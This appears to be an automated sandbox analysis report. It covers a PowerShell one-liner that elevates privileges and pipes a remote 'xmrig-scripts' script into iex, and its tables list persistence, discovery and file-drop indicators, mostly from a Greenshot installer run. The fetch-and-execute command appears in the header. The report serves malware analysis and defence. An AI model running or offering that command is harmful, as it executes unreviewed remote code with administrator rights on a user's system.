Analysis Overview
Threat Level: Likely malicious
The file http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex was found to be: Likely malicious.
Malicious Activity Summary
Downloads MZ/PE file
Executes dropped EXE
A potential corporate email address has been identified in the URL: [email protected]
Loads dropped DLL
Command and Scripting Interpreter: PowerShell
Drops desktop.ini file(s)
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Checks installed software on the system
Subvert Trust Controls: Mark-of-the-Web Bypass
Launches sc.exe
Drops file in Program Files directory
Drops file in Windows directory
System Network Configuration Discovery: Internet Connection Discovery
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Access Token Manipulation: Create Process with Token
Browser Information Discovery
Uses Task Scheduler COM API
NTFS ADS
Modifies Control Panel
Checks processor information in registry
Modifies Internet Explorer settings
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of WriteProcessMemory
Checks SCSI registry key(s)
Suspicious behavior: AddClipboardFormatListener
Suspicious behavior: GetForegroundWindowSpam
Enumerates system info in registry
Modifies registry class
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
Suspicious use of FindShellTrayWindow
Runs ping.exe
Modifies registry key
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-13 07:23
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-13 07:23
Reported
2024-11-13 08:08
Platform
win11-20241007-en
Max time kernel
2700s
Max time network
2587s
Command Line
Signatures
Downloads MZ/PE file
A potential corporate email address has been identified in the URL: [email protected]
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\Greenshot-INSTALLER-1.2.10.6-RELEASE.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-RCUTO.tmp\_isetup\_setup64.tmp | N/A |
| N/A | N/A | C:\Program Files\Greenshot\Greenshot.exe | N/A |
| N/A | N/A | C:\Program Files\Greenshot\Plugins\GreenshotOCRPlugin\greenshotocrcommand.exe | N/A |
Loads dropped DLL
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Greenshot = "C:\\Program Files\\Greenshot\\Greenshot.exe" | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
Checks installed software on the system
Command and Scripting Interpreter: PowerShell
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini | C:\Windows\explorer.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | camo.githubusercontent.com | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Greenshot\Plugins\GreenshotOCRPlugin\GreenshotOCRCommand.exe | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\is-S9B53.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotOCRPlugin\is-ISPDR.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotOCRPlugin\is-18HKN.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotOCRPlugin\is-JT76M.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotImgurPlugin\is-F5RSP.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotExternalCommandPlugin\is-04HRU.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotOCRPlugin\is-LR66V.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotOCRPlugin\is-SJJN3.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Plugins\GreenshotOfficePlugin\is-AH51K.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotOCRPlugin\is-RQ2MH.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotImgurPlugin\is-2IDCM.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotImgurPlugin\is-JUAQB.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotExternalCommandPlugin\is-DRHL9.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotImgurPlugin\is-JBO19.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotExternalCommandPlugin\is-UM4GL.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\unins000.msg | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\is-KU4Q9.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotOCRPlugin\is-MGM43.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotImgurPlugin\is-BMFRP.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotImgurPlugin\is-QKSBM.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotExternalCommandPlugin\is-LDAO2.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotExternalCommandPlugin\is-51T2U.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotExternalCommandPlugin\is-55QDT.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File opened for modification | C:\Program Files\Greenshot\Greenshot.exe | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\is-NPD97.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotOCRPlugin\is-A8OE1.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotOCRPlugin\is-9B7KD.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Plugins\GreenshotImgurPlugin\is-62VQ5.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotImgurPlugin\is-JDRPO.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotExternalCommandPlugin\is-MJ7N1.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotExternalCommandPlugin\is-LQ48H.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\is-RM7CL.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\is-8SRII.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\is-L67H6.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotOCRPlugin\is-OEK6B.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotOCRPlugin\is-F58TB.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotImgurPlugin\is-M0HBK.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotImgurPlugin\is-FQFNJ.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotExternalCommandPlugin\is-0KCL5.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\is-Q9U9U.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotImgurPlugin\is-QNEPK.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotImgurPlugin\is-2G93M.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotImgurPlugin\is-A642T.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotImgurPlugin\is-676C9.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotExternalCommandPlugin\is-57LJH.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotExternalCommandPlugin\is-H9TUD.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\is-4EETE.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\is-77KNE.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotOCRPlugin\is-NACB9.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotOCRPlugin\is-C45DB.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotOCRPlugin\is-9A4RN.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotImgurPlugin\is-SSH4J.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotExternalCommandPlugin\is-RA2F5.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Plugins\GreenshotOCRPlugin\is-M310A.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotOCRPlugin\is-RCS7M.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotExternalCommandPlugin\is-J6E5D.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotExternalCommandPlugin\is-87R8S.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\is-5G9FT.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\is-98PL0.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Plugins\GreenshotOCRPlugin\is-ENBUN.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotImgurPlugin\is-6D8RR.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File opened for modification | C:\Program Files\Greenshot\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\assembly\NativeImages_v2.0.50727_64\index17.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\ngenlock.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File opened for modification | C:\Windows\assembly\NativeImages_v2.0.50727_64\indexc.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File opened for modification | C:\Windows\assembly\NativeImages_v2.0.50727_64\index13.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File opened for modification | C:\Windows\assembly\NativeImages_v2.0.50727_64\index14.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File opened for modification | C:\Windows\assembly\NativeImages_v2.0.50727_64\index15.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\NativeImages_v2.0.50727_64\index14.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File opened for modification | C:\Windows\assembly\NativeImages_v2.0.50727_64\index13.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\GACLock.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File opened for modification | C:\Windows\assembly\NativeImages_v2.0.50727_64\index18.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\NativeImages_v4.0.30319_64\Greenshot\1c7cbeae03e956efcf671a6f3ea6d088\Greenshot.ni.exe.aux.tmp | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\GACLock.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\NativeImages_v2.0.50727_64\Temp\ZAP9A4A.tmp\log4net.dll | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File opened for modification | C:\Windows\assembly\NativeImages_v2.0.50727_64\indexf.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File opened for modification | C:\Windows\assembly\NativeImages_v2.0.50727_64\indexe.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\ngenlock.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File opened for modification | C:\Windows\assembly\NativeImages_v2.0.50727_64\index11.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\NativeImages_v2.0.50727_64\Temp\ZAPB285.tmp\System.Security.dll | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Numerics\429d1f533624b62ab398cd9238b6be2f\System.Numerics.ni.dll.aux.tmp | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\NativeImages_v4.0.30319_64\GreenshotPlugin\1fd5ba98e3dc7e9dedec5f51bdd3884a\GreenshotPlugin.ni.dll.aux.tmp | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\NativeImages_v4.0.30319_64\LinqBridge\fe10f24c40ec4722ed97cf4c7d098e7c\LinqBridge.ni.dll.aux.tmp | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File opened for modification | C:\Windows\assembly\NativeImages_v2.0.50727_64\indexe.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File opened for modification | C:\Windows\assembly\NativeImages_v2.0.50727_64\index12.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\NativeImages_v2.0.50727_64\index18.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\NativeImages_v2.0.50727_64\Temp\ZAP9C2E.tmp\System.Configuration.dll | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\GACLock.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\NativeImages_v2.0.50727_64\index13.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File opened for modification | C:\Windows\assembly\NativeImages_v2.0.50727_64\index13.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File opened for modification | C:\Windows\assembly\NativeImages_v2.0.50727_64\index16.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File opened for modification | C:\Windows\assembly\NativeImages_v2.0.50727_64\index17.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File opened for modification | C:\Windows\assembly\NativeImages_v2.0.50727_64\index19.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp\tem4A0E.tmp | C:\Windows\system32\Clipup.exe | N/A |
| File created | C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\e6c-0\GreenshotPlugin.dll | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\ngenlock.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\ngenlock.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File opened for modification | C:\Windows\assembly\NativeImages_v2.0.50727_64\index10.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File opened for modification | C:\Windows\assembly\NativeImages_v2.0.50727_64\index12.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File opened for modification | C:\Windows\assembly\NativeImages_v2.0.50727_64\index16.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\GACLock.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\NativeImages_v2.0.50727_64\index17.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\ad0-0\System.Deployment.dll | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\11cc-0\System.Runtime.Serialization.Formatters.Soap.dll | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\GACLock.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File opened for modification | C:\Windows\assembly\NativeImages_v2.0.50727_64\index11.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\GACLock.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File opened for modification | C:\Windows\assembly\NativeImages_v2.0.50727_64\index18.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\NativeImages_v2.0.50727_64\index19.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1060-0\System.Data.SqlXml.dll | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\GACLock.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\NativeImages_v2.0.50727_64\index12.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File opened for modification | C:\Windows\assembly\NativeImages_v2.0.50727_64\index15.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\NativeImages_v2.0.50727_64\index10.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File opened for modification | C:\Windows\assembly\NativeImages_v2.0.50727_64\index14.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\NativeImages_v2.0.50727_64\Temp\ZAPD37A.tmp\System.Deployment.dll | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\GACLock.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\b98-0\Greenshot.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1058-0\System.Numerics.dll | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\NativeImages_v2.0.50727_64\Temp\ZAP948D.tmp\GreenshotPlugin.dll | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\NativeImages_v2.0.50727_64\indexe.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\GACLock.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\ngenlock.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\NativeImages_v2.0.50727_64\Temp\ZAPD697.tmp\LinqBridge.dll | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Security\ed88e474eb5a0dec06f9de17e677f038\System.Security.ni.dll.aux.tmp | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Runt9064068c#\c3e367eff9875c967c92b75a8688c55b\System.Runtime.Serialization.Formatters.Soap.ni.dll.aux.tmp | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
Launches sc.exe
Subvert Trust Controls: Mark-of-the-Web Bypass
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\Greenshot-INSTALLER-1.2.10.6-RELEASE.exe:Zone.Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Access Token Manipulation: Create Process with Token
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\DllHost.exe | N/A |
